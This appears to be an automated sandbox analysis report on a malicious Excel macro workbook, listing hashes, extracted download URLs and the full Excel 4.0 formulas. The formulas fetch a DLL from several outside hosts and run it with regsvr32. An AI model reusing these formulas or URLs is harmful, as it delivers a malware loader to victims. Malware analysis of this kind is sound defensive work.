General
-
Target
VJX-88747877189.xlsm
-
Size
46KB
-
MD5
94effc0e0771b71bad4593c9430fe67b
-
SHA1
4aa62a4efbb8c02b145fe5db3c0873ac0fe275c4
-
SHA256
989afb22d889ef10aefc7185c5a8d051fa3dd6c0f2a6a811c1a89498e293b615
-
SHA512
30c83fa06219cc8c0365d1f8487a3591e0cf2ac90e92019b8ccdb018f0711349b273c12dc5fa69ecc23c9c06d8e367ca72e5c6747987ff43b2b5229b76e86892
-
SSDEEP
768:cmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:dBlntTEvDLmXi3JvG6YzATOJnXYSXRM
Malware Config
Extracted
http://eles-tech.com/css/KzMysMqFMs/
http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
https://txpcrescue.com/cgi-bin/5tSO8/
http://hadramout21.com/jetpack-temp/Py/
http://haribuilders.com/zoombox-master/4HYGX/
http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0) =IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0)) =IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0)) =IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0)) =IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0)) =IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0)) =IF('PIMKE'!C24<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
VJX-88747877189.xlsm